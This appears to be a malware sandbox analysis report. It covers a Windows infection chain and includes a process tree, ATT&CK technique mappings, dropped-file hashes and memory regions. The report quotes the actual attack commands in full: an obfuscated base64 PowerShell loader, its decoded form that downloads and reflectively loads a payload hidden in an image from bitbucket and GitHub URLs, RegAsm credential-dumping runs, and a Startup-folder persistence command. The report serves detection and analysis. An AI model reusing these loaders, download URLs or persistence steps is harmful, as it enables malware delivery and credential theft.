        Suspicious use of WriteProcessMemory
        
        PID:2084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#C##d#B4#HQ#LgBt#H##YwBm#FM#bgBr#C8#cwBk#GE#bwBs#G4#dwBv#GQ#LwBm#Hc#Zg#v#Hc#ZgBz#GY#dwBm#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.mpcfSnk/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
        10⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4088
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        11⤵
        Checks computer location settings
        Suspicious use of SetThreadContext
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:3788
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\msqctefiomttmdodkokrwsfk"
        12⤵
        
        PID:420
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\msqctefiomttmdodkokrwsfk"
        12⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1968
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\onvvmpqjcumyojchtzxlzxztmqc"
        12⤵
        
        PID:3184
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\onvvmpqjcumyojchtzxlzxztmqc"
        12⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:2756
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zhbnnhjdpcelzxytckrmkkukvwlzkq"
        12⤵
        
        PID:4696
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zhbnnhjdpcelzxytckrmkkukvwlzkq"
        12⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1156
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\jcrmqvlvprqrakg.vbs"
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:4828
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url" & echo URL="C:\Users\Admin\AppData\Local\DesignInno Innovations\InnoCraft.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:3980

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
906a96ab3d13d754809f312628f6e4ac

SHA1
4f1f3d49c788e5736c31904eaf4683ea4e8683c6

SHA256
69f03040bf4208bbfc3617a35799ad9897c2235df7832dc7687c8b91ef2f99e8

SHA512
a0f5fad77325a869edb9a80beb4f2604c5f6d5af652f21a2283e366cd32d42f6fb2f4761d596c6a77a2d83fda4ab52d9a645aedbce5295223c0e30faf306a851

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\603423\Lucas.pif

Filesize
872KB

MD5
18ce19b57f43ce0a5af149c96aecc685

SHA1
1bd5ca29fc35fc8ac346f23b155337c5b28bbc36

SHA256
d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd

SHA512
a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

Download Submit
C:\Users\Admin\AppData\Local\Temp\603423\s

Filesize
713KB

MD5
a61cd75428195955c56a9eef603912ce

SHA1
8e8d3aa2e563765617254aa949f8b6c274bb0a83

SHA256
8c9e7ab10c40aaea832b0c5704108f9390c5982bd25a32c8602794613b4e9cd4

SHA512
227023389522767a8739e30e39bf702df11f724cf7f7c65f24ba8de3036fc627073d8e2b64ad250911e587eca3867a92a3619c96fa349b5781fd31da9974d0e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Clay

Filesize
94KB

MD5
08d48bb5a4e1c7a5a6ccec11c1a6cb68

SHA1
3d609ee87ca224a316227a8225b0f5ffe465aa98

SHA256
d1aae1434e502cea9556e394ce892df5407af5f1110222d6303032f792ed57fd

SHA512
19c7b4236b6e06b5d909b326ef73435d7e864f2c345adae1dd10f1af4f2b6a68d46c8339d9c0f17d00fc4a2947dcfccb1e8dbd1e9fbd29872ef65d61587c991f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Controllers

Filesize
5KB

MD5
630673fea68bda5ce7750d0bacb5ff0e

SHA1
ca24cfdd26fe66409230e5e1509f86d2bc3a0ba5

SHA256
be6a1c82eae77cf9bbaabefa38e652236a31317ccbf9f9f2387f4155b871a33d

SHA512
3a96dee0f6141f7d84aa3fd475a837c0dcf4d7afde871f87fde8c1199fb5514628b9d7efb05d3b720fd8e22166e44467e5863fdfa197193b7e3c04dd917084c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Disposition

Filesize
56KB

MD5
64be2aa6b09b4d3b1ae7f5496dc50d36

SHA1
d74a4209344293473d5ba7ec8f044419ca140b5d

SHA256
5773776eb34d9b7cf9efb47ff33655462607bcad9eafed7e3d27f192667b9944

SHA512
c9dae81739761f34ba9a1dcc16d484a76032b888954615884e70dff5fc9259dba7a89acfe0144cc60ae3bf3d20487e3c9a80cec19adc6575b4f9aaf92ee0b9a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Fighters

Filesize
62KB

MD5
c255a215a56f0191ff16163454ba6ed9

SHA1
2268b09fb0e58c569bc2cdf0562d7adb12471776

SHA256
e616974209f50ab58459f6fb5a960122cd37241b8c57a89556f443161c92b148

SHA512
5a009da0bddb7a49ef1cc6b270769c527de138c643eb454763e73efcdb9c40e918a70539956bfe0bfcfc248efdf4ff759080dc42b4b591f3a853ff0ff9ee8137

Download Submit
C:\Users\Admin\AppData\Local\Temp\Healthcare

Filesize
866KB

MD5
783575f3f822151ed1b1e1022a10e027

SHA1
d03e7b6be2eeb48e0e09b9050c4739b07a1a889d

SHA256
d1e3a4a8b96f3ea63281200340552d7a1e0a5514f3bb5726d10b0d871c20357e

SHA512
e19791dc189b3f699d02efbd8c1b05afbe6049ccf1d09a2a89d9fcc64ad15d10076389bac02ea110f76b959040f96e45b58b14568ae4874381e2515d1d9b595e

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\one.vbs

Filesize
15KB

MD5
3ab49c12b0bfcbb323bb5a1d340107ff

SHA1
c8f4f55296010f3122ac48ef5a173d74fa2c80d8

SHA256
333773edb783ec93040e6cf60f1873095f59606ae6dd376128bf44111551fe36

SHA512
09bb6cf4dad3ebb494c50c588c7b7e6516654e8ec498357c251d33ac183416376110f5e44b38f876d76d6122f593a393a85b2c693ac3289f8f8adea70e9d7c73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kits

Filesize
14KB

MD5
479ca8f2e48fcf67b018c911cd335ae1

SHA1
f8a2d5e86a8854bb97e1aa48e9dfe10fd24b32ef

SHA256
59194cc6347489f833b3d58ec07b1caa054fb48856c1d27299584ef34707a638

SHA512
9d5ce01be08edcde6904067b0e3c26f06d17f4501fa6dc68f8665c9b63faebd39acb6dc2eee82180532c71c63c4531db029bbdc78388eb0326263ffe964e496e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Mars

Filesize
62KB

MD5
7e3b9b5efedce4231bb02f1fd97fcd5d

SHA1
1042788b51134c23008ed274b598559e9b1568d8

SHA256
b7e8ee21f058df49534eac35fa6e4cdf1c3e6f599e0b131344f349284a0ce5b3

SHA512
3c621de45969a177209e9f6027cce646d165130c3d40a84f2920d3939efd30479e9e21912a8fc016f63ab84fdfa0879201faa421fa90031db6c81250bb524ff9

Download Submit
C:\Users\Admin\AppData\Local\Temp\MicrosoftServiceUpdater.exe

Filesize
180KB

MD5
1b8a04e03b265d0397c024b692e25c6e

SHA1
475eb0fd8f6582285b243e0773a61dc9ff8696da

SHA256
76efb280fc1d0ddf376aef018f26f3185fbd80990fb283ff02f522ead480b207

SHA512
521025cec9875929f3fb1dbf24f004d30b76cc0d21f07b9dc36d50624630044774471d6eb57886ea500254c9a51175fc668bdc3a0d17fec74c3521f61144b97c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Models

Filesize
83KB

MD5
a265646b71f2bd90b49af78bacb0a603

SHA1
c43be494ff7b8802e7e013c3d576767844a0102d

SHA256
ae7f2c347f8938bbf0532472bbc8984fe93e7c0748b1d368b1172dd1f2df60f2

SHA512
090d00aa588ad1cce583edbcc66b1b6de002d34fdca5743b6114ffcb84f4b645ee9947cdc494e83fedf4f704b13067b3fdc21f88f33e3085bcbe105d445577c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Paying

Filesize
94KB

MD5
440b16f0da2cabdfdb6de4c4f73a6061

SHA1
e983bc7837886155a9b45ff9c17cc5dad5daa02f

SHA256
992d790758c278dd0653c40bd77f70d8ee0378f277162637215ecae8815fe034

SHA512
4a49079828a9a6150de7b582be92dd7a43364a43b2fe04f1a782b5e32a36b3de9f4587b4091d82760bf566e318dc925d4684ec8a9e7993b8899b8ec042c6d917

Download Submit
C:\Users\Admin\AppData\Local\Temp\PdfReaderEn.EXE

Filesize
1.2MB

MD5
5699d5b44379624ebc78078a1b85e18c

SHA1
ec5c17b3d75b17ecac13189411c947a2e702d2bf

SHA256
06363ca6381d7c68f453b58f0566966caa9169c25dea626cfcb7001a3dd7bc5f

SHA512
db80b2bf2fba5ca707c34b3b96b37cc6f1b07d3ea932e8a1cf18dcbd0c14de264dc30b04aa079666aa1f6a37999d78a7b6bc6ba658486f241801e53e3dbe8ab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Semester

Filesize
14KB

MD5
a6d6c60fd822110be81938b5a83b9533

SHA1
5c6e5fb2f1ec160731f29757d7510a78190d1b21

SHA256
d11304a432fbd7ff5d1e44778d5bd348360ee46b00240049284f95276bdd47df

SHA512
e46a75de38b77af796e90426e89e8e5d697d7cad8f309f7067752c7b7341d81c0bb65ff1bbabe71026fafcdaedcd4ed29c0f5ceef086305f1b8c771bb6a189e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Southampton

Filesize
75KB

MD5
359570710d9793aa98e354bcbf386a38

SHA1
7b44dde782d9276654ef05e67a1dab5fa4310e85

SHA256
7146161b192a851540672d31b69b91f6d732cee8777ebbe6246798a4838d07e2

SHA512
8ec53f429a6ec12057a517cb32371e6e921a0fb10db2c462870c9bdff605b1247b07e2b29c199cb189f88c2baaaca7da0e427eb4ccf441b414fd0c64fd174c49

Download Submit
C:\Users\Admin\AppData\Local\Temp\Transition

Filesize
80KB

MD5
c42fcc17904fa666d76265b8a45b7734

SHA1
368acd51bd62beedb4cbddf7142473d5a873484d

SHA256
05fb815535624e6fdebd1d3fd3c41e5e056c368a7ca57e2d681b7e91aaa6a44e

SHA512
900c1f3fc85a96ff9384f8a15df264aec456a54841108e27f347797afd25031922db535a2749d1b627e28aea5206bfa7960bb1ca72820eb49b19e3543401b2db

Download Submit
C:\Users\Admin\AppData\Local\Temp\Usually

Filesize
93KB

MD5
1885adf09acfa4b8818bf8153786cbc3

SHA1
48b1c38c8712f683e722cbc1f7977a6b3f4e3b7d

SHA256
3ea7cee5a287a1f5a6923ccf717025658c0476968df6b6d5a1783a8b9f4dde74

SHA512
83d007312ccaac1e17d74feba18149f351e135f1c972bba62157e273863eecd566479c62d103048bba1eb6afebebe1eba4c018ffb7f2dd7da12dbb9455215e42

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qdaokvrf.lub.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\jcrmqvlvprqrakg.vbs

Filesize
544B

MD5
4196262905f64f1dd00381f882d1e2c4

SHA1
325434edd2f6930f987de42e51228ca348745413

SHA256
0b3cbde8778e4f47322ca017b5280f6eed3cd6f327b436eea4e91fbeb364a092

SHA512
c3367ac15a473485aceafbe52aa591e33fb67dff21896b936173db78d2889f9ee200ce4b7d78ede67bc471433444dea1c4cb36013cda7f6f9f7df3416bb1aa73

Download Submit
C:\Users\Admin\AppData\Local\Temp\msqctefiomttmdodkokrwsfk

Filesize
4KB

MD5
c3c5f2de99b7486f697634681e21bab0

SHA1
00f90d495c0b2b63fde6532e033fdd2ade25633d

SHA256
76296dc29f718988107d35d0e0b835c2bf3fc7405e79e5121aa4738f82b51582

SHA512
7c60ffdc093de30e793d20768877f2f586bee3e948767871f9a1139252d5d2f593ba6f88ce0ed5f72c79faddb26186792df0581e4b6c84d405c44d9d12f951b8

Download Submit
memory/956-30-0x00007FFAAB9B0000-0x00007FFAAC471000-memory.dmp

Filesize
10.8MB

Download
memory/956-12-0x00007FFAAB9B0000-0x00007FFAAC471000-memory.dmp

Filesize
10.8MB

Download
memory/956-11-0x00007FFAAB9B0000-0x00007FFAAC471000-memory.dmp

Filesize
10.8MB

Download
memory/956-10-0x00000247DC1A0000-0x00000247DC1C2000-memory.dmp

Filesize
136KB

Download
memory/956-0-0x00007FFAAB9B3000-0x00007FFAAB9B5000-memory.dmp

Filesize
8KB

Download
memory/1156-137-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1156-136-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1156-132-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1748-173-0x0000000003F20000-0x0000000003FA2000-memory.dmp

Filesize
520KB

Download
memory/1748-168-0x0000000003F20000-0x0000000003FA2000-memory.dmp

Filesize
520KB

Download
memory/1748-171-0x0000000003F20000-0x0000000003FA2000-memory.dmp

Filesize
520KB

Download
memory/1748-177-0x0000000003F20000-0x0000000003FA2000-memory.dmp

Filesize
520KB

Download
memory/1748-170-0x0000000003F20000-0x0000000003FA2000-memory.dmp

Filesize
520KB

Download
memory/1748-169-0x0000000003F20000-0x0000000003FA2000-memory.dmp

Filesize
520KB

Download
memory/1748-176-0x0000000003F20000-0x0000000003FA2000-memory.dmp

Filesize
520KB

Download
memory/1748-180-0x0000000003F20000-0x0000000003FA2000-memory.dmp

Filesize
520KB

Download
memory/1748-167-0x0000000003F20000-0x0000000003FA2000-memory.dmp

Filesize
520KB

Download
memory/1748-166-0x0000000003F20000-0x0000000003FA2000-memory.dmp

Filesize
520KB

Download
memory/1748-165-0x0000000003F20000-0x0000000003FA2000-memory.dmp

Filesize
520KB

Download
memory/1748-172-0x0000000003F20000-0x0000000003FA2000-memory.dmp

Filesize
520KB

Download
memory/1748-179-0x0000000003F20000-0x0000000003FA2000-memory.dmp

Filesize
520KB

Download
memory/1748-178-0x0000000003F20000-0x0000000003FA2000-memory.dmp

Filesize
520KB

Download
memory/1968-124-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1968-128-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1968-130-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1968-126-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2756-129-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2756-125-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2756-131-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3204-22-0x0000020602510000-0x000002060254E000-memory.dmp

Filesize
248KB

Download
memory/3788-118-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3788-143-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/3788-145-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3788-146-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3788-147-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3788-148-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3788-149-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
